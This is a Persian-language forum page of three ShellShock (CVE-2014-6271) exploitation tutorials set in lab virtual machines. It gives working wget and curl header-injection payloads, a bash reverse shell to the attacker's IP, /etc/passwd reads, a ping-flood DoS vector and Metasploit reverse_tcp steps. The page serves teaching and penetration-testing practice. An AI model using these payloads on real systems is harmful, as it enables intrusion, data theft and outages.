جستجو در تالارهای گفتگو

این آموزش یک آزمایشگاه تست نفوذ برای تولید و نشان دادن نحوه بهره برداری از آسیب پذیری ShellShock می باشد دانلود آسیب پذیر : https://www.pentesterlab.com/exercises/cve-2014-6271 اندازه: 19 مگابایت نوع سیستم عامل: لینوکس یک نقص در سمت Bash مورد ارزیابی برخی از متغیرهای محیطی خاص قرار گرفته است . یک مهاجم می تواند از این نقص برای رفع محدودیت های محیطی یا رفع محدودیت ها برای اجرای دستورات Shell استفاده کند که ما قبلا shellshock را با چارچوب Metasploit مورد سوء استفاده قرار دادیم. Shellshock به نام Bashdoor نیز شناخته می شود ، یک باگ امنیتی امنیتی در Unix Bash shell است که اولین مورد آن در 24 سپتامبر 2014 منتشر شد. بسیاری از سرویس های اینترنتی مانند بعضی از سرویس دهندگان وب، از Bash برای پردازش استفاده می کنند این درخواست، به مهاجم این اجازه را می دهد برای اجرای دستورات دلخواه به ایجاد نسخه های آسیب پذیر از Bash اقدام کند و مهاجم بتواند دسترسی غیرمجاز به سیستم کامپیوتری را به دست آورد . مرحله 1 – فایل ISO فوق را دانلود کنید و در Vmware Workstation نصب کنید در اینجا ما از کالی لینوکس (192.168.169.137) به عنوان یک مهاجم (همیشه) استفاده میکنیم و سعی میکنیم از طریق مرورگر (192.168.169.139) به IP Pentesterlab دسترسی پیدا کنیم که به صورت زیر است: درخواست را با استفاده از Intercept متوقف کنید و آن را به تب Spider بفرستید Burp Spider یک ابزار خودکار خزیدن (crawling) برای برنامه های کاربردی وب است در حالی که معمولا فرایند های دستی زمان زیادی را از شما می گیرد می توانید از Burp Spider به طور خودکار برای برنامه های بسیار بزرگ و با زمان کمتری از این این فرایند استفاده کنید. Burp Spider از تکنیک های مختلف برای خزیدن در محتوای برنامه استفاده می کند و به طور پیش فرض تمام پیوندها در دامنه را دنبال می کند ، فرم ها را با داده های ساختگی ارسال می کند و درخواست های بیشتری را (برای robots.txt، ریشه های دایرکتوری و ...) می سازد . در برخی موارد، اجرای خودکار Spider می تواند پیامدهای ناخواسته ای مانند ثبت نام حساب کاربری جدید ، تولید ایمیل های بازخورد یا تغییر حالت دیگر برنامه داشته باشد . برای بهره برداری از "Shellshock"، باید راهی برای گفتگو با Bash پیدا کنیم . به این معنی که CGI که از Bash استفاده می کند را پیدا خواهد کرد . CGI ها معمولا از پایتون یا پرل استفاده می کنند ، اما غیر معمول نیست (در سرورهای قدیمی)، CGI در Shell یا حتی C نوشته شده است. بنابراین ما یک اسکریپت به نام وضعیت “status” در زیر پوشه cgi-bin داریمMIME که از نوع JSON است. اگر از کد منبع صفحه اصلی نگاه کنید، یک لینک اسکریپت cgi وجود دارد که دستورات سیستم را اجرا می کند و آنها را در یک صفحه وب نمایش می دهد. پس از پیدا کردن صفحه CGI، میتوانید از «wget» برای آزمایش اینکه آیا آسیب پذیری ShellShock در این صفحه CGI وجود دارد یا خیر، استفاده کنید. Command: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -c ‘echo vulnerable'” http://192.168.169.139/cgi-bin/status همانطور که در بالا می بینیم ، دستور “echo vulnerable” توسط سرور اجرا شده است، بنابراین به ShellShock آسیب پذیر است. در ابتدا یک ترمینال را به عنوان یک شنونده در پورت 5555 با استفاده از ابزار netcat تنظیم کنید. Command: nc -nlvp 5555 در ترمینال دیگری فرمان زیر که به اتصال بالا در پورت مشخص شده اتصال می دهد. Command: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -i >& /dev/tcp/192.168.169.137/5555 0>&1″ http://192.168.169.139/cgi-bin/status اگر شروع اتصال در حالت hanging باشد ، نشانه واقعا خوبی است ، CGI در انتظار شما برای اتصال است. با رفتن به Netcat می توانیم دستورات (whoami, id, uname -a ) را به صورت محلی تایپ کنیم و آنها را در سیستم آسیب دیده به اجرا در آوریم که در زیر نشان داده شده است: همانطور که دستگاه Pentesterlab متعلق به گروه sudoers است بنابراین با تایپ دستور "sudo / bin / bash" به راحتی می توانید ROOT را دریافت کنید. علاوه بر این، شما می توانید با BurpSuite هم اکسپلویت کنید. با استفاده از BurpSuite به جای Wget، هدر User-Agent را تغییر دهید و می توانید از Burp repeater استفاده کنید درخواست را متوقف کنید و به تب Repeater ارسال کنید: توجه داشته باشید : اطمینان حاصل کنید که در پایان درخواست خام خود را در Burp ، تعداد 2 خط خالی وجود دارد در غیر این صورت درخواست کار نخواهد کرد! بخش درخواست را با کد زیر تغییر دهید تا تست کنید آیا هدف آسیب پذیر است یا خیر. GET /cgi-bin/status HTTP/1.0 user-agent: () { :; }; /bin/bash -c ‘echo Vulnerable!’ همانگونه که قبلا دیده ایم ، اگر خطای سرور داخلی عدد 500 یا عدیدی که با 5 شروع شده باشد را نشان دهد، به این معنی است که هدف به ShellShock آسیب پذیر است. در گام بعد ، سعی کنید محتویات فایل /etc / passwd با همان کد را بردارید. GET /cgi-bin/status HTTP/1.0 user-agent: () { :; }; /bin/bash -c ‘cat /etc/passwd’ اما هیچ خروجی نمایش داده نشد. در گام بعدی سعی کنید دستگاه کالی لینوکس خود را با هدرهای کامل باز کنید . GET /cgi-bin/status HTTP/1.1 Host: 192.168.169.139 User-Agent: () { :; }; /bin/bash -c ‘ping -c 3 192.168.169.137’ Accept: text/html, application/xhtml-xml, application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 اکنون مشاهده می کنید عدد 200 را به عنوان پاسخ دریافت کردیم و خروجی روی صفحه نمایش داده می شود که شما با استفاده از ابزار TCPDUMP برای درخواست ICMP می توانید آن را تایید کنید. Command: tcpdump -i eth0 -n icmp ادامه دارد ... ( کپی فقط با ذکر منبع )

در آموزش قبلی، از چارچوب Metasploit استفاده کردیم تا با استفاده از آسیب پذیری ShellShock یک Shell سطح پایین در سیستم هدف را به دست آوریم همان را نیز می توان با ارسال یک درخواست HTTP با Wget و Curl انجام داد. به منظور بهره برداری از باگ ShellShock ، مراحل زیر باید رخ دهد: شما باید سرور هدف را برای تزریق یک رشته خاص به یک متغیر محیطی بدست آورید و پس از تنظیم متغیر محیطی، هدف (به طور مستقیم یا غیر مستقیم) بایستی (یک نسخه آسیب پذیر) از bash shell را راه اندازی کند. برای درک بهتر پیامدهای چنین اشکال، یک فایل bash ساده با محتوای زیر ایجاد کنید و آن را در داخل پوشه usr / lib / cgi-bin/ ذخیره کنید. در این آموزش ما از همان آسیب پذیری که آدرس IP آن 192.168.20.128 است توسط Metasploitable2 برای نمایش استفاده می کنیم Command: cd /usr/lib/cgi-bin Command: sudo nano yeahhub.sh Code: #! /bin/bash echo “Content-type: text/html” echo “” echo “Hello yeahhub.com” اجازه 755 به فایل yeahhub.sh را با تایپ کردن "sudo chmod 755 yeahhub.sh" اعطا می کنیم در هر مرورگری فایل "http://192.168.20.128/cgi-bin/yeahhub.sh" به راحتی قابل دسترسی است. ساده ترین راه برای آزمایش یک وب سرور از طریق درخواست HTTP این است که فرمان bash را از طریق عامل کاربر تزریق کنید. Command: wget -U ‘() { :;}; /bin/bash -c “echo vulnerable”‘ http://192.168.20.128/cgi-bin/yeahhub.sh اگر یک خطای سرور 5XX ایجاد شود ، به این معنی است که احتمالا سرور به یک اکسپلویت آسیب پذیر است. همچنین می توانید با فرستادن یک درخواست با دستور CURL تست کنید: Command: curl -A ‘() { :;}; /bin/bash -c “echo vulnerable”‘ http://192.168.20.128/cgi-bin/yeahhub.sh اکنون آن را با wget فراخوانی کنید تا مبنای رشته عامل کاربر را تغییر دهد که در واقع فایل etc / passwd/ را نشان می دهد. Command: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; echo; /bin/cat /etc/passwd” http://192.168.20.128/cgi-bin/yeahhub.sh دستور بالا تمامی محتویات فایل etc / passwd / از ماشین هدف شما را (یعنی Metasploitable2) را بیرون می آورد و آن را با نام yeahhub.sh (فایل متنی ساده) ذخیره می کند همانطور که در زیر نشان داده شده است : اگر دستور بالا را اشکال زدایی کنید، خروجی به این صورت واکنش نشان خواهد داد: () { test } echo \”Content-type: text/plain\” echo /bin/cat /etc/passwd Content-type فقط برای تصویر است و از خطای 500 جلوگیری می کند و محتویات فایل را نشان می دهد. مثال فوق نیز نشان می دهد که مشکل خاصی از خطاهای برنامه نویسی نیست و ورودی کاربر نمی تواند مورد سوء استفاده قرار گیرد. اگر فقط می خواهید از IP به عنوان یک ربات حمله استفاده کنید که منجر به حمله DOS شود، بردار حمله به ایت ترتین خواهد بود : () { :; }; ping -s 1000000 <victim IP> همچنین می توانید از یک اسکریپت shellshocker.py با منبع باز که یک ابزار خط فرمان است برای انجام آزمایش استفاده کنید Command: git clone https://github.com/liamim/shellshocker.git ShellShocker دو روش مختلف برای اجرا دارد: یک ابزار خط فرمان و یک رابط وب است که در Heroku مستقر شده است برای آزمایش در دستور زیر را تایپ کنید: Command: python shellshocker.py <your-target-domain> بهره برداری از ShellShock با CURL - درخواست مخرب را از طریق CURL به دستگاه هدفی ارسال کنید که آسیب پذیردر برابر ShellShock است Command: curl -v http://192.168.20.128/cgi-bin/yeahhub.sh -H “custom:() { ignored; }; /usr/bin/id” اگر میخواهید فایل etc / passwd / را مشاهده کنید ، فرمان زیر را اجرا کنید Command: curl http://192.168.20.128/cgi-bin/yeahhub.sh -H “custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd “ ( کپی با ذکر منبع )

در این آموزش با استفاده از چارچوب Metasploit سوءاستفاده از آسیب پذیری (ShellShock (CVE-2014-6271 را نشان می دهیم . از سری آسیب پذیری های ShellShock می توان آسیب پذیری Bash Bug را نام برد که در حال حاضر هزاران سیستم عامل لینوکس / یونیکس را تحت تاثیر قرار می دهد . این آسیب پذیری ابتدا توسط Stephane Chazelas کشف شد. اساسا، ShellShock به یک مهاجم اجازه می دهد دستوراتی را به عملکرد تعاریف در مقادیر متغیرهای محیطی اضافه کند . این آسیب پذیری می تواند به عنوان یک نوع حمله تزریق طبقه بندی شود و از زمانی که Bash بعد از تعریف تابع ، این دستورات را پردازش می کند تقریبا هر کد دلخواهی می تواند اجرا شود . مشکل ShellShock نمونه ای از آسیب پذیری اجرای کد دلخواه (ACE) است. به طور معمول حملات آسیب پذیری ACE بر روی برنامه هایی اجرا می شود که نیاز به درک بسیار پیچیده ای از سازوکار درونی اجرای داخلی کد ، طرح حافظه و ... دارند . به طور خلاصه، این نوع حمله نیاز به یک متخصص دارد. مهاجم از یک آسیب پذیری ACE برای آپلود یا اجرای یک برنامه استفاده می کند که به مهاجم یک روش ساده برای کنترل دستگاه هدف می دهد . این پروسه غالبا با اجرای "Shell" به دست می آید . Shell یک خط فرمان است که از طریق آن دستورات را می توان وارد و اجرا کرد . برای اینکه متوجه شوید در این زمینه آسیب پذیر هستید یا نه از فرمان زیر استفاده کنید Command: x='() { :;}; echo VULNERABLE’ bash -c : OR Command: env x='() { :;}; echo VULNERABLE; exit;’ bash -c ‘echo NOT VULNERABLE’ دستور bash -c را اجرا می کند متن () {:؛}؛ echo VULNERABLE به عنوان مقدار متغیر محیط x تنظیم شده است و یک نمونه از bash را ایجاد می کند تا اجرا شود برای اطلاعات بیشتر لطفا به stackexchange مراجعه کنید. اگر bash شما آسیب پذیر باشد ، سیستم شما کامل آسیب پذیر است زیرا با استفاده از bash در کنار وکتورهای حمله مانند اسکریپت های CGI، مشتریان DHCP و حساب های SSH محدود شده است بنابراین باید بررسی شود که آیا bin / sh bash / واقعی است یا یک Shell متفرقه می باشد . این آسیب پذیری در یک ویژگی خاص bash است و Shell های دیگر مانند dash و ksh تحت تاثیر قرار نمی گیرند. شما می توانید Shell پیش فرض را با اجرای همان تست بالا به جای bas بر روی sh بزنید : Command: x='() { :;}; echo VULNERABLE’ sh -c : بهره برداری با چارچوب Metasploit در اینجا ما یک محیط مجازی را با Metasploitable2 Machine راه اندازی کرده ایم که آدرس IP آن 192.168.20.128 است (ممکن است آی پی شما متفاوت باشد). Metasploitable2 یکی از بهترین ماشین مجازی ها می باشد برای انجام این کار، فقط یک اسکریپت اجرایی در cgi-bin / (که در usr / lib / cgi-bin / قرار دارد) ایجاد کنید و کد زیر را داخل آن اضافه کنید. Command: cd/usr/lib/cgi-bin/ Command: sudo nano yeahhub.sh Code: #! /bin/bash echo “Content-type: text/html” echo “” echo “Hello yeahhub.com” اجازه 755 به فایل yeahhub.sh را با تایپ کردن "sudo chmod 755 yeahhub.sh" اعطا می کنیم Command: sudo chmod 755 yeahhub.sh اکنون با دسترسی از طریق مرورگر می توانید بررسی کنید http://192.168.20.128/cgi-bin/yeahhub.sh حالا چارچوب Metasploit را با دستور msfconsole بارگذاری کنید و همه اکسپلویت های مرتبط با shellshock را با دستور جستجو لیست کنید، همانطور که در زیر مشاهده می کنید : 1. Command: search shellshock در اینجا لیست کامل اکسپلویت هایی است که نشان می دهد : 1) auxiliary/scanner/http/apache_mod_cgi_bash_env (2014-09-24 | normal | Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner) 2) auxiliary/server/dhclient_bash_env (2014-09-24 | normal | DHCP Client Bash Environment Variable Code Injection (Shellshock)) 3) exploit/linux/http/advantech_switch_bash_env_exec (2015-12-01 | excellent | Advantech Switch Bash Environment Variable Code Injection (Shellshock)) 4) exploit/linux/http/ipfire_bashbug_exec (2014-09-29 | excellent | IPFire Bash Environment Variable Injection (Shellshock)) 5) exploit/multi/ftp/pureftpd_bash_env_exec (2014-09-24 | excellent | Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)) 6) exploit/multi/http/apache_mod_cgi_bash_env_exec (2014-09-24 | excellent | Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)) 7) exploit/multi/http/cups_bash_env_exec (2014-09-24 | excellent | CUPS Filter Bash Environment Variable Code Injection (Shellshock)) 8) exploit/multi/misc/legend_bot_exec (2015-04-27 | excellent | Legend Perl IRC Bot Remote Code Execution) 9) exploit/multi/misc/xdh_x_exec (2015-12-04 | excellent | Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution) 10) exploit/osx/local/vmware_bash_function_root (2014-09-24 | normal | OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)) 11) exploit/unix/dhcp/bash_environment (2014-09-24 | excellent | Dhclient Bash Environment Variable Injection (Shellshock)) 12) exploit/unix/smtp/qmail_bash_env_exec (2014-09-24 | normal | Qmail SMTP Bash Environment Variable Injection (Shellshock)) بارگیری و اکسپلوست کردن آسیب پذیری ، گزینه شماره 6 می باشد این ماژول از آسیب پذیری Shellshock بهره می برد و نقص آن در چگونگی Bash shell متغیرهای محیط خارجی است . این ماژول اسکریپتهای CGI را در وب سرور آپاچی با تنظیم کردن متغیر محیط HTTP_USER_AGENT به یک تابع مخرب، هدف قرار می دهد . Command: use exploit/multi/http/apache_mod_cgi_bash_env_exec برای نمایش تنظیمات مختلف این ماژول / اکسپلویت ، گزینه "show options" را تایپ کنید در اینجا می توانیم به موارد پیش فرض بسنده کنیم اما نیاز به تنظیم RHOST به آدرس IP هدف (192.168.20.128) و ( URI (/cgi-bin/yeahhub.sh داریم Command: set RHOST 192.168.20.128 Command: set TARGETURI /cgi-bin/yeahhub.sh در گام بعدی باید یک payload را انتخاب کنید تا اتصال TCP را به شما نشان دهد Command: set payload linux/x86/shell/reverse_tcp همچنین می توانید برای مشاهده پیلود های مختلف “show payloads” را تایپ کنید که البته این مورد اختیاری می باشد علاوه بر این، باید آدرس LHOST خود را با آدرس IP دستگاه خود (Kali Linux - 192.168.20.129) تنظیم کنید . Command: set LHOST 192.168.20.129 و سپس دستور "check" را تایپ کنید تا مطمئن شوید هدف شما همان آسیب پذیری ShellShock را دارد یا خیر مشاهده می کنیم که هدف واقعا آسیب پذیر است، بنابراین از دستور اکسپلوست برای راه اندازی حمله استفاده کنید بعد از این عملیات یک shell session را باز می کند که در آنجا می توانید دستورات سطح سیستم مانند شناسه ID یا whoami را برای مشاهده اطلاعات مربوط به کاربر فعلی اجرا کنید توجه داشته باشید : این یک shell محدود است، به این معنی که شما فقط می توانید به مقدار محدود از سطح سیستم را برای بالا بردن سطح دسترسی اجرا کنید ، برای همین باید با استفاده از یک Linux Kernel Exploit اقدام به افزایش سطح دسترسی محلی کنید. ( کپی با ذکر منبع )